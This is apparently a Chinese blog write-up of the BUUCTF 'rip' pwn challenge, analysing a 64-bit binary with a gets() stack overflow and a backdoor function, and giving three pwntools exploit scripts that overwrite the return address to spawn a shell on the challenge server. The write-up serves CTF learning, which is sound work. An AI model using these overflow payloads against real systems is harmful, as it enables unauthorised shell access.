BUU刷题-Pwn-rip

最新推荐文章于 2024-04-26 17:43:46 发布
最新推荐文章于 2024-04-26 17:43:46 发布
阅读量262 收藏 1
点赞数
分类专栏: BUU_pwn解题wp 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65474192/article/details/131669608
版权
解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:无需
  3. libc地址:无需
  4. BSS段地址:无需
    劫持程序执行流程:[[ret2libc(栈溢出调用任意函数)]]
    获得shell或flag:[[劫持返回地址]]
学到的知识:

[[堆栈平衡]]

题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file pwn1 
pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1c72ddcad651c7f35bb655e0ddda5ecbf8d31999, not stripped
                                                                                                                     
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=pwn1 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified    Fortifiable     FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   64) Symbols       No    0   1pwn1

libc版本:
wp借鉴:buuctf rip 详细wp - refrain-again - 博客园 (cnblogs.com)
(23条消息) buu rip_沫忆末忆的博客-CSDN博客_buu rip
你终于回来了(。・∀・)ノ (cnblogs.com)

核心伪代码分析:

存在利用的的代码:

int fun()
{
  return system("/bin/sh");
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[15]; // [rsp+1h] [rbp-Fh] BYREF

  puts("please input");
  gets(s, argv);//get是一个输入函数
  puts(s);
  puts("ok,bye!!!");
  return 0;
}
分析:

有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)
里面有详细解释,涉及到[[堆栈平衡]]

.text:0000000000401186 fun             proc nears

-000000000000000F s               db ?
......
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

注意:
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。菜鸡的我被这个问题困了好久,然后就放弃了打远程,感谢博主让我回头看了看这个题并明白了

脚本:

脚本:
一共得到了三种脚本:

来源:(23条消息) buu rip_沫忆末忆的博客-CSDN博客_buu rip
exp1

from pwn import *

p = remote('node3.buuoj.cn',28109)

payload = b'a'*23+p64(0x401185)+p64(0x401186) 

p.sendline(payload) 

p.interactive()

exp2

from pwn import *

p = remote('node3.buuoj.cn',28109) 

payload = b'a'*15+p64(0x401186) 

p.sendline(payload) 

p.interactive()

来源:你终于回来了(。・∀・)ノ (cnblogs.com)
exp3

from pwn import *

p = remote("node4.buuoj.cn",27296)

payload=b'A'*15+b'B'*8+p64(0x401186+1)

p.sendline(payload)

p.interactive()
Brinmon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUU pwn 刷题
qq_36495104的博客
05-19 1485
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
BUU刷题 easy_heap
清霂的博客
05-13 175
目录easyheapmagicheapciscn_2019_n_3 easyheap #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "easyheap" context(os="linux", arch=arch, log_level="debug") content = 1 offset = 0 # elf elf = ELF(filename) fake_heap_addr=0x6
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4896
BUU CTF PWN 入门知识详解
buu rip
qq_45691294的博客
12-10 1972
连接上题目环境后,发现可以输入字符,然后得到返回 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 用IDA分析程序,发现主函数和一个名为fun的子函数 先看main函数的汇编代码和伪代码 get很明显没有限制输入,那么就存在溢出的漏洞,在字符串表中又发现了/bin/sh的字符,在fun函数中用了system函数进入到/bin/sh,那么就可以通过将fun函数的地址覆盖到返回地址就可以实现溢出获得系统权限 双击s查看输入点在栈的位置,发现只需存入15个字节即可劫持函数返回地址,因此
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1094
(写得好详细我好爱(为什么payload有两种写法于。
BUU-rip
qq_45771413的博客
04-27 659
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
2021-07-05-Buu刷题-pwn-rip--一些碰到的问题分析(做个题快做吐了,I’M so vegetable)
yundi的博客
07-06 1428
参考: https://www.cnblogs.com/yisicanmeng/articles/13906728.html https://www.cnblogs.com/vict0r/p/13773132.html https://blog.csdn.net/qq_41079177/article/details/99971701 https://blog.csdn.net/qq_53086690/article/details/116502865 出现的错误 1.直接复制脚本没改成node4.buuo
BUUCTF 【Pwnrip 解题步骤
2301_81505831的博客
01-25 748
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Project-Decoder-Ring
03-27
项目解码器环 项目描述:解码器环 该应用程序具有3种不同的解码器。 1.凯撒密码是一种替换密码,其中明文中... 2.... 3.... “单位”可以是单个字母(最常见),成对的字母,字母的三元组,上述的混合形式,等等。... 屏幕截图:
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
rip-BUUCTF(栈溢出)
yuqie的博客
06-14 337
使用ida反汇编程序,发现是一个栈溢出类型,从函数中可以看出给了一个s数组,但没有对输入的长度作限制,因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。 发现并没有canary保护。使用gdb结合pwndbg调试进程,计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点,并使用r(run)运行。 使用命令 n 按行运行,找到输入点,并随便输入几个字
BUUCTF刷题笔记2
m0_74245809的博客
04-24 119
11
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2582
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
刷题日记2(buuctf web题)
Aurora_lili的博客
04-25 197
单纯的url/flag.php得不到任何东西,查看wp,解释如下:这里它利用了filter伪协议,该协议刚好就能够查看文件包含的漏洞,所以当我们利用该协议查看flag.php时,会将它的源代码爆出来,但是因为base64的加密原因,所以我们还需要进行一次base64解密。5.0版本以上,varchar(100),指的是100字符,无论存放的是数字、字母还是UTF8汉字(每个汉字3字节),都可以存放100个。接着用改名字的方式获取flag,因为flag在1919的表中,所以我们最后要查询的是1919的表,
ripPwn
qq_45913417的博客
11-18 2360
IDA中SHIFT+F12: 漏洞点+后门已获得,开启乱杀之路: from pwn import * context.os = 'linux' context.arch = 'amd64' context.log_level = 'debug' # io = process('./pwn1') io = remote('redirect.do-not-trust.hacking.run', 10368) elf = ELF('./pwn1') // 由于该题目没有清除缓冲区,导致recv接收不到...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值